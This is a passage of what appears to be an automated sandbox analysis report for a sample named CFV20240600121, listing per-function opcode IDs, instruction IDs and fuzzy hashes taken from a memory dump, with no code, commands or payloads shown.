                                        • Instruction Fuzzy Hash: 16413A31A00239DBDB11DE1C8450BBAB761EB90B9DF56806FEA44CB341E6328D80C791
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f52f2c0af566ea0d9f8f2b0c1fb23ff293ed6cc3116d85f91b65bf988666a67b
                                        • Instruction ID: 4b70ec133ad3ec87143a6277d4cfb33311105ba77711df0988ea609c989526d4
                                        • Opcode Fuzzy Hash: f52f2c0af566ea0d9f8f2b0c1fb23ff293ed6cc3116d85f91b65bf988666a67b
                                        • Instruction Fuzzy Hash: 94417A72600701EFE725CF19E840B26BBF8FF54718F60866AE449CB291E770E942CB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                        • Instruction ID: ea4e62b3625c75b46d8700cec8957f815d474e7a70e4b4279d5e5610838395ff
                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                        • Instruction Fuzzy Hash: 76411671A00605EFDB25CF9AC980BAABBF4FB18740B10497EE556D72A1D330EA44CB90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e46d92faf1ddfa5c0d45bea8c050fa235b2cdf66b4f9fef9e6d56bac96281cee
                                        • Instruction ID: 536a2e22c13022bb7fe692a3041981833c5c11b203a45b66e970f95949b2b30f
                                        • Opcode Fuzzy Hash: e46d92faf1ddfa5c0d45bea8c050fa235b2cdf66b4f9fef9e6d56bac96281cee
                                        • Instruction Fuzzy Hash: 7741EFB2501705CFCB22EF29E900B6AB7B5FF54328F1182AEC4069B6A2DB309941CF50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52a50d8af975d651c4920bb45170ddffd365e47a1223fdd8ecbd5663a972d163
                                        • Instruction ID: 7ee80bd97ebe3a75b41080f57e22b7813c7eb985b55bed84deabf9afca886137
                                        • Opcode Fuzzy Hash: 52a50d8af975d651c4920bb45170ddffd365e47a1223fdd8ecbd5663a972d163
                                        • Instruction Fuzzy Hash: D13169B1A00355DFDB52CF99C080799BBF0EB19728F2181AED119EB3A1D3329942CF90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f4b0ab6f2ed60b69f86bc88be5382655d649822da5980e5be36f339d499d863
                                        • Instruction ID: d9e48102670d1d19853fc2ecf731e23a97f9654f4d05828e38c186c677ab2fea
                                        • Opcode Fuzzy Hash: 9f4b0ab6f2ed60b69f86bc88be5382655d649822da5980e5be36f339d499d863
                                        • Instruction Fuzzy Hash: 56417BB25043019FD360DF29C845F9BBBE8FF98754F108A2EF99897261E7709905CB92
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfcbeea05a81dd0f9276f8e05ea535dc7a837cb68b3adb7ae8f00469ed96b99e
                                        • Instruction ID: eb05096132b7b9a3b2ad31fac975af75b620bd720db14e945d280acedcfc4559
                                        • Opcode Fuzzy Hash: cfcbeea05a81dd0f9276f8e05ea535dc7a837cb68b3adb7ae8f00469ed96b99e
                                        • Instruction Fuzzy Hash: 02410771E0561AAFCB01DF5CC8406A9B7F5FF94B68F1082AED815A7690DB34EE418BD0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c61ea9992e75bdb70bbe2f25009496cf91f3cedad726260d58c02702dd2a9622
                                        • Instruction ID: 63f5d21aacb20ff912145a3f3941be157f37407bd8477cd739b82815e74fcec4
                                        • Opcode Fuzzy Hash: c61ea9992e75bdb70bbe2f25009496cf91f3cedad726260d58c02702dd2a9622
                                        • Instruction Fuzzy Hash: 7B41DF766046469FC320DF2CC840A6BB7E9BFC8700F14062EF998976A1E730E914C7A6
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 024ff49ac3def52d65510b2c6d6d620351e51365a1c3c97e4fa0d6bbf8d8560a
                                        • Instruction ID: aa2cf68c2c81626f9a06b9e1f7ee5018a1de8828a853e222e680a9c5914b90a2
                                        • Opcode Fuzzy Hash: 024ff49ac3def52d65510b2c6d6d620351e51365a1c3c97e4fa0d6bbf8d8560a
                                        • Instruction Fuzzy Hash: B641E5722003028FD725DF2DE884B2ABBE9FF80358F14446DF6858B6A1DB70D955CB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8c02348bcadbffdcf441162527d656f7648a9b6f195786f6ec04dbd27bf8298
                                        • Instruction ID: 3713a2ab69fa3d233ac4241953c8d0d78eb95ae8aecddd94f6e1f98beb66ac25
                                        • Opcode Fuzzy Hash: a8c02348bcadbffdcf441162527d656f7648a9b6f195786f6ec04dbd27bf8298
                                        • Instruction Fuzzy Hash: 984180B2A016198FCF15CF6DC98099DF7F1FF98728B1085AED466A7260DB349E41CB40
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                        • Instruction ID: 3002b4f4d2e350174eebb9c9f2522028405106ea5e633aed512e19b95bfde745
                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                        • Instruction Fuzzy Hash: A731F532A04358AFDB128B6CCC48BDBBFE9AF54354F0841A6F855D7392C6B49944CBA0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ae13bca60d31a5f5fc6ed0ac1f93ba75947f3ebddbdce555a32e098125f9fcc
                                        • Instruction ID: 6c6eed1bcd5972a312d78f7a51da54f8d22c8244c3e881af6b8a71b736d0a6d1
                                        • Opcode Fuzzy Hash: 4ae13bca60d31a5f5fc6ed0ac1f93ba75947f3ebddbdce555a32e098125f9fcc
                                        • Instruction Fuzzy Hash: 3731B935740716ABDB229F698D41FAB76A8AB58B54F000179FA00BB3E1DAB4DC05C7A0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a1b4731e6452a43ea5025dfe0f044e15f4e0f2d97db1059bef3aa0c062512f0
                                        • Instruction ID: 79b2466b279bf1d56a6c9de2288cc9c869cc80c3fd1f23612e577cc219e58a39
                                        • Opcode Fuzzy Hash: 9a1b4731e6452a43ea5025dfe0f044e15f4e0f2d97db1059bef3aa0c062512f0
                                        • Instruction Fuzzy Hash: C93192326052129FD321EF1DD980F2AB7E9FF84364F0A846EE9599B361D730E841DB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fad83aabe05ff23ef3be0092acc37ad16b282b8c6153b92a0e02753573f3a51f
                                        • Instruction ID: e965e6bf76727bcec3287b16d92812d918a8b653cddc624a778e3b70602c577d
                                        • Opcode Fuzzy Hash: fad83aabe05ff23ef3be0092acc37ad16b282b8c6153b92a0e02753573f3a51f
                                        • Instruction Fuzzy Hash: F341AD36200B459FD722CF28C481B967BE9AF99718F05852EE6598B760CB70E804CB50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cac8e4f18adfc0448483c792133fb9cfa03f2543a0c7b9d49106633f88fb55e
                                        • Instruction ID: 6750a1bd5c76df48910eb116e20c31f18271445aff6931502253648e17bf3928
                                        • Opcode Fuzzy Hash: 0cac8e4f18adfc0448483c792133fb9cfa03f2543a0c7b9d49106633f88fb55e
                                        • Instruction Fuzzy Hash: A1317E716043028FD320EF29C980B2AB7E9FB84720F0A456EF9559B3A1D730E805DB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d22db7e748caee5e2d1256fe6f300880ca6b509fa8c688e1aea74ce873b1faa
                                        • Instruction ID: 7cf33b4d83e2a8c406481805e5f3f388477ea5662f1ae2fa62822f42fac52cf2
                                        • Opcode Fuzzy Hash: 6d22db7e748caee5e2d1256fe6f300880ca6b509fa8c688e1aea74ce873b1faa
                                        • Instruction Fuzzy Hash: 0531B0316016D69BF322976DC948B267BD8BB40B48F1D04A6AF45AB7F2DB3CD841C224
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf32daa3bdd93eea8c50db61f0cabfa3930a0d3e0f7a73c763de1a975e974763
                                        • Instruction ID: 4e9eedd6cc8fc06ced07e08d35ae1247425c561cb7b35579f28d55b91dc51391
                                        • Opcode Fuzzy Hash: cf32daa3bdd93eea8c50db61f0cabfa3930a0d3e0f7a73c763de1a975e974763
                                        • Instruction Fuzzy Hash: D031E475A00216ABDB15DF98CD40BAEBBB5FB44740F4641AAE900AB254D770ED00CB90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 496083b7bbaab8cae78f6c725368ca3c9bc061dec6fbb7c9f6d75b4a8a83cf4d
                                        • Instruction ID: d5f735b3df33c444be9308f69fa2b0b0bef1cedeba7d01135e0aa38b01946919
                                        • Opcode Fuzzy Hash: 496083b7bbaab8cae78f6c725368ca3c9bc061dec6fbb7c9f6d75b4a8a83cf4d
                                        • Instruction Fuzzy Hash: C6314776A4012DABCF21DF69DD44BDEBBF9AB98350F1500E5E508A7260DA30DE51CF90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3aecb7f352a94b75dc4e81f8800db563bfdc55795e82fb97542d27eb1be9a8f
                                        • Instruction ID: ee732c84570a6dd354ed52680f55c8a606e2ae8785cf8691c1d4c1fbd4f77f65
                                        • Opcode Fuzzy Hash: f3aecb7f352a94b75dc4e81f8800db563bfdc55795e82fb97542d27eb1be9a8f
                                        • Instruction Fuzzy Hash: 3231EB32E04219AFDB21DFADCD44AAFBBF9EF44754F01443AE516D7260D2709E008BA0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f86102b7643470cfc6c170a87e9974bdcaa0a2ee149a520516cfe2000eff1000
                                        • Instruction ID: 4f5883204460e92e358c712a58a17578721569a62b5fbca3009221dbe1ffd56f
                                        • Opcode Fuzzy Hash: f86102b7643470cfc6c170a87e9974bdcaa0a2ee149a520516cfe2000eff1000
                                        • Instruction Fuzzy Hash: 5B31E2B5B40212AFDB229FA9C851A6BBBB9AB84754F05406EE505DB3A1DA70DC018B90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bf596e983ff68e48160340980bd8bed7f3227a48181b07f98e6f422a1b6dd72
                                        • Instruction ID: 2f8160821331c262c4991c27458e25e48887d6619b3b080f269ab516682d3cca
                                        • Opcode Fuzzy Hash: 0bf596e983ff68e48160340980bd8bed7f3227a48181b07f98e6f422a1b6dd72
                                        • Instruction Fuzzy Hash: CE310533A04316DBC716DE68E880A6BBFA5EFD4A58F01452DFD59A7310DA30DC0187E1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51d831ee93a880a6273890eb50f41f6689860c1753495acbed4bae2aa9ee373d
                                        • Instruction ID: ea9eaae877a8bffcb3cf4d612a93988198ec39bf0d7c5c84a5aaa0c0648ec493
                                        • Opcode Fuzzy Hash: 51d831ee93a880a6273890eb50f41f6689860c1753495acbed4bae2aa9ee373d
                                        • Instruction Fuzzy Hash: 81316DB26053018FE720CF19D840B5BFBE6FB98704F45496EEA9497361D7B0E848CB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                        • Instruction ID: 0b7032c1a6f7d30619d87dc91ce8b263e31a02a5737ebd55722c2ccd25da617d
                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                        • Instruction Fuzzy Hash: 09312E72B01701AFE765CF6ECD40B57BBF8AB59650F14453EA55AC37A0E630E9008B50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d36bb615dafec526655c772beb6790107dc6b27f74d5861c32f870bb77670ea2
                                        • Instruction ID: 133d6c9ad7445f57592463c3ca2b02d8b7fae2da65cee2c5b0fc51dc0dc8f79b
                                        • Opcode Fuzzy Hash: d36bb615dafec526655c772beb6790107dc6b27f74d5861c32f870bb77670ea2
                                        • Instruction Fuzzy Hash: BF319C79505301CFC711DF1AC54489ABBF9FF89618F058AAEE488AB361D331D945CB92
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91cb4961a5709daa9a37d9449502e77395e4165d840cd5fdccc31bbf34bb367e
                                        • Instruction ID: 6180c1f7eb5bba3e03971fa4d91a4e574374d5dc5070766a0291e6dd6742b4e9
                                        • Opcode Fuzzy Hash: 91cb4961a5709daa9a37d9449502e77395e4165d840cd5fdccc31bbf34bb367e
                                        • Instruction Fuzzy Hash: FD31D431B002059FD720EFA9C984B6FBBF9EB94308F00852ED205E76A5D730D945CB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                        • Instruction ID: ea74efbac4ee61977061122d7c0489e16670487a888c6ba5fa4aaabb40438cd0
                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                        • Instruction Fuzzy Hash: A2210936E0026AAADB10DBB9C840BAFFBB5AF14744F15803ADE55E7750E270CD418790
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c45d293b25ce1e39715c73a965ce433caea79adad0f7960679e7ded496c50005
                                        • Instruction ID: fa6aade39d96e8c8da8ca17ea590f2252a405117c266d53ca7ebd9071a9ef39a
                                        • Opcode Fuzzy Hash: c45d293b25ce1e39715c73a965ce433caea79adad0f7960679e7ded496c50005
                                        • Instruction Fuzzy Hash: 6A31FC729003218BD731AF6CCC45B6A77B4AF90318F94C16ADD499B391DA78D9C6CB90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                        • Instruction ID: 75419bee64b0e56ef0e7e7ae343fdbf23b249fdfe6540f2545921f23210cb433
                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                        • Instruction Fuzzy Hash: 2721DB36600652A6CB15BBDA8C40AFFBBB5EF50B10F40842FFA55876B1E634D990C370
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0b27699f4e33d6ba5b2d593c0cd266825999e9fadd4b6b00754e9f451875634
                                        • Instruction ID: 5459b7a0b3104376dd55d9fc792c8122e43b411fc32a267a65cdd5a56a92ef35
                                        • Opcode Fuzzy Hash: c0b27699f4e33d6ba5b2d593c0cd266825999e9fadd4b6b00754e9f451875634
                                        • Instruction Fuzzy Hash: 9D31B632A4152C9BDB31DB18CC41FEEBBB9EB15B48F0101B9E645A7290D674DE808F90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                        • Instruction ID: 515f2a89f8324b57a7eb97f871cf61951e36133b489239012d836ba14b9f2412
                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                        • Instruction Fuzzy Hash: 5A21B631A00605EBCB11DF99C980A9EBBB5FF58314F14857AEE199B290E675DA018B50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 333d7778e20790e704e555b85608c2b6915a0dc08356e5cc19269c174b41c1e2
                                        • Instruction ID: 262dcdaca68eca9c10c46a845a901d4be77f6b6c29704582f29c34f5162c11bc
                                        • Opcode Fuzzy Hash: 333d7778e20790e704e555b85608c2b6915a0dc08356e5cc19269c174b41c1e2
                                        • Instruction Fuzzy Hash: B221E3726047159BCB22DF19C840F6B77E4FB88760F05462AFF489B290D731E9018BA2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                        • Instruction ID: b4ca8dee13614111acc0f8ada6a8478173af63f19d14e94c6c3749e983426b44
                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                        • Instruction Fuzzy Hash: 9C319A31600609EFD721CFA9C884F6ABBF9FF85758F1045A9E5129B690E770EE42CB50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4a76ec7a380dd72760479e4f551414a503d284e3a02f1a4ee8573c3cd356d6c
                                        • Instruction ID: 1c7bcd78f4e0c6ed72b2ed3e84eaaf8d282ebe97d15e6cf84e34ce8b066c31d4
                                        • Opcode Fuzzy Hash: a4a76ec7a380dd72760479e4f551414a503d284e3a02f1a4ee8573c3cd356d6c
                                        • Instruction Fuzzy Hash: 2231A275A00205EFEB14CF1CC8849AE77B6FF88304F55845AE80DAB3A1E775E951CB90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49d098a78b7ab17e050a3877c8b77de93a3c5839deafc150d0534b984af38358
                                        • Instruction ID: f5d6efc0b32d1668ef890186e3406c66e4b2b74cae14b9770cffd22484f44bb6
                                        • Opcode Fuzzy Hash: 49d098a78b7ab17e050a3877c8b77de93a3c5839deafc150d0534b984af38358
                                        • Instruction Fuzzy Hash: 8F219175900229DBCF20DF59C881ABEB7F8FF48744B55006AF941AB354E738AD42CBA0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d87852f5f6807fe9bf31665b63733b676996faf8750ded4e8a518004a425be9
                                        • Instruction ID: b0537067ae8a9e88bcda4bd41abc57bdd9c461cc042007f6e46779f899b2d1ea
                                        • Opcode Fuzzy Hash: 3d87852f5f6807fe9bf31665b63733b676996faf8750ded4e8a518004a425be9
                                        • Instruction Fuzzy Hash: F621EA75600605AFD711DB6CC844F6AB7E8FF88384F1400AAF908DB7A1D634ED00CBA8
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0fcadc8723023593bbea07d3a5656c43c6ea598810341b30b9c298db5d3ea011
                                        • Instruction ID: 54e2319e5d0afa51e3ff97e6ed0c540a755b05c9cfae4d91157db85207981bf5
                                        • Opcode Fuzzy Hash: 0fcadc8723023593bbea07d3a5656c43c6ea598810341b30b9c298db5d3ea011
                                        • Instruction Fuzzy Hash: F821B0769043469BD721EF6DD948B5BBBECAF90344F08045BBE80C72A2D734D909C6A2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2288b5e793ec24a6882431a126ecd9e747434223753ed0107c0bb2468d3176f
                                        • Instruction ID: c18adba66e144119abd3618eee281d935000cb8f94f26f248d75109e072be6b5
                                        • Opcode Fuzzy Hash: a2288b5e793ec24a6882431a126ecd9e747434223753ed0107c0bb2468d3176f
                                        • Instruction Fuzzy Hash: EC21FC31645695DBE322576CCD08B263FD5AF45778F2803A9FA60DB7F2D778C8028241
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
